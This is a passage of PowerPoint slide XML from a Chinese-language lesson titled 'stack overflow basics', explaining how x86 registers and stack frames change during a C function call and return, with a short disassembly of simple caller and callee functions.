                  <a:srgbClr val="1A1A1A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eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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随之指向相邻的下一条指令，如此反复，程序就得以连续执行指令。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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</a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A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1A1A1A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下面让我们来看看发生函数调用时，栈顶函数状态以及上述寄存器的变化。变化的核心任务是将调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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caller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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）的状态保存起来，同时创建被调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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）的状态。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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</a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A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1A1A1A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首先将被调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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）的参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF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按照逆序依次压入栈内</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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。如果被调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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）不需要参数，则没有这一步骤。这些参数仍会保存在调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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caller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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）的函数状态内，之后压入栈内的数据都会作为被调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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）的函数状态来保存。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:effectLst/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565B4F1-8D77-4EDE-9195-2A3CC162D1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9442" y="1311499"/>
            <a:ext cx="4677428" cy="3848637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6684A278-462C-4A95-93A8-FE7EA214BAF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8035412" y="5177169"/>
            <a:ext cx="31854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将被调用函数的参数压入栈内</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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37E7BE6-FDFF-4CDA-AABD-AE2CEA8F9959}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="56388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栈溢出基础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| C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语言函数调用栈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219923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01F21D3C-9F5D-47B3-93F0-1EF18E038016}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431912" y="2828834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1A1A1A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然后将调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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caller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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）进行调用之后的下一条指令地址作为返回地址压入栈内。这样调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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caller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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）的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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（指令）信息得以保存。</a:t>
            </a:r>
            <a:b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</a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US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FA4BF80-115D-40CD-B3D9-35F214B5A4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7089" y="1333207"/>
            <a:ext cx="4648849" cy="4191585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3EB173F8-13F3-4815-A6EF-9419AF434AAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7837937" y="5524792"/>
            <a:ext cx="36471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将被调用函数的返回地址压入栈内</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A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E544343-CD9E-41EC-9759-A05A653B8DC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="56388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栈溢出基础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| C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语言函数调用栈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868375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2C49A3C1-9D59-4E76-8C59-9E4B374B3FC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="196641" y="2677251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1A1A1A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再将当前的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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寄存器的值（也就是调用函数的基地址）压入栈内，并将 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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寄存器的值更新为当前栈顶的地址。这样调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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caller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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）的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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（基地址）信息得以保存。同时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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被更新为被调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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）的基地址。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AAA5965-1568-4BF2-9444-D655D6C49F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3531" y="853673"/>
            <a:ext cx="4654401" cy="467642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2ACD245E-A344-49AC-AB07-0D84C105C4CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7173530" y="5530098"/>
            <a:ext cx="465440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将调用函数的基地址（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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ebp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）压入栈内，并将当前栈顶地址传到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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ebp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寄存器内</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A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450286E-2AE4-471C-AC49-AAEF6B5C30B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="56388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栈溢出基础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| C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语言函数调用栈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501411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E30619AA-F164-4FAE-819F-8D4F084C049C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431912" y="2880377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1A1A1A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再之后是将被调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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）的局部变量等数据压入栈内。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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1EABE21-65EC-489F-B225-E707B2631F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1665" y="763450"/>
            <a:ext cx="4280091" cy="4880186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4ABBEAF0-EE77-4681-97E4-B7A8BE94D710}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7938134" y="5709043"/>
            <a:ext cx="36471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将被调用函数的局部变量压入栈内</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A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6438E6D-AB74-45E4-925F-492337B72CEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="56388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栈溢出基础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| C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语言函数调用栈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323313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01288C6B-31B6-4828-815F-3758AE90730A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523741" y="1746391"/>
            <a:ext cx="6096000" cy="3970318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1A1A1A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在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF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压栈</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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的过程中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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寄存器的值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF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不断减小</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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（对应于栈从内存高地址向低地址生长）。压入栈内的数据包括调用参数、返回地址、调用函数的基地址，以及局部变量，其中调用参数以外的数据共同构成了被调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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）的状态。在发生调用时，程序还会将被调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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）的指令地址存到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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寄存器内，这样程序就可以依次执行被调用函数的指令了。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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</a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A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1A1A1A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看过了函数调用发生时的情况，就不难理解函数调用结束时的变化。变化的核心任务是丢弃被调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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）的状态，并将栈顶恢复为调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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caller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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）的状态。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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</a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A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1A1A1A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首先被调用函数的局部变量会从栈内直接弹出，栈顶会指向被调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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）的基地址。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:effectLst/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BEDC965-E6E6-4685-9ACE-9DB1A068BE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2887" y="1030820"/>
            <a:ext cx="4572638" cy="4525006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DD0F8543-7244-4548-8DD9-705790DEACB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7865630" y="5716709"/>
            <a:ext cx="36471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将被调用函数的局部变量弹出栈外</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A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89DDBCC-41FD-46FF-8E4F-9815B5D7C907}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="56388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栈溢出基础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| C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语言函数调用栈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742813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8BD08833-B5F9-48EE-A6B6-5A9414488AFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431912" y="2735514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1A1A1A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然后将基地址内存储的调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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caller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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）的基地址从栈内弹出，并存到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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寄存器内。这样调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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caller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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）的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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（基地址）信息得以恢复。此时栈顶会指向返回地址。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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0C80AA8-108B-442D-A019-3047C69693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4413" y="1068045"/>
            <a:ext cx="4658375" cy="4258269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F4E38BD6-CCA7-4B6A-B806-11DA690FC193}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7762611" y="5326314"/>
            <a:ext cx="398197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将调用函数（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caller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）的基地址（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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ebp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）弹出栈外，并存到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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ebp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寄存器内</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A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4B9A076-914F-40E4-8C98-744258387406}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="56388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栈溢出基础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| C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语言函数调用栈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345904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AB9C875E-D211-4E66-B249-DF90D79401A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="536619" y="2667951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1A1A1A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再将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF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返回地址从栈内弹出，并存到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF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eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF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zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF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寄存器内</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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。这样调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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caller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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）的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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（指令）信息得以恢复。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A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solidFill>
                <a:srgbClr val="1A1A1A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至此调用函数（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caller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）的函数状态就全部恢复了，之后就是继续执行调用函数的指令了。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115AB59-B4A3-4FBB-BE71-A367114B21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0957" y="1372375"/>
            <a:ext cx="4591691" cy="3791479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388184CF-06F8-4F37-9B0A-7BB5D8CA5401}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7868863" y="5163854"/>
            <a:ext cx="353587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将被调用函数的返回地址弹出栈外，并存到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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eip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寄存器内</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A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B3263A0-C094-4A6B-A50B-D31F9371A135}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="56388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栈溢出基础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| C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语言函数调用栈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2849814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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6821995" y="4334704"/>
            <a:ext cx="4712800" cy="225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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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00000000 &lt;callee&gt;:</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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0:   55          push   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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1:   89 e5       mov    %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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3:   8b 55 08    mov    0x8(%ebp),%edx</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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6:   8b 45 0c    mov    0xc(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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9:   01 c2       add    %eax,%edx</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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b:   8b 45 10    mov    0x10(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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e:   01 d0       add    %edx,%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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10:   5d          pop    %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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11:   c3          ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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37" name="Shape 237"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6821995" y="1340504"/>
            <a:ext cx="4712800" cy="31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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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00000012 &lt;caller&gt;:</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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12:   55              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" kern="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push   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0" dirty="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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13:   89 e5           mov    %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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15:   83 ec 10        sub    $0x10,%esp</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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18:   6a 03           push   $0x3</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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1a:   6a 02           push   $0x2</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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1c:   6a 01           push   $0x1</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
